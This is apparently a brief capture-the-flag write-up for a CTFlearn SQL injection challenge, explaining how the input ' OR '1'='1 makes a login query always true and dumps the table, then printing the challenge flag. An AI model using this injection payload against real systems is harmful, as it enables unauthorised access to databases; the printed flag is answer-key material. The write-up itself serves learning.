Basic Injection
See if you can leak the whole database using what you know about SQL Injections. link Don't know where to begin? Check out CTFlearn's SQL Injection Lab
The website takes user input and puts it in an SQL query.
We want our input to be such that the query's login is true.
' OR '1'='1
The input will cause the SQL query to look as follows:
SELECT * FROM webfour.webfour where name = '' OR '1'='1'
As the name
field is blank and 1 is always equal to 1, the entire database is leaked.
Flag
CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}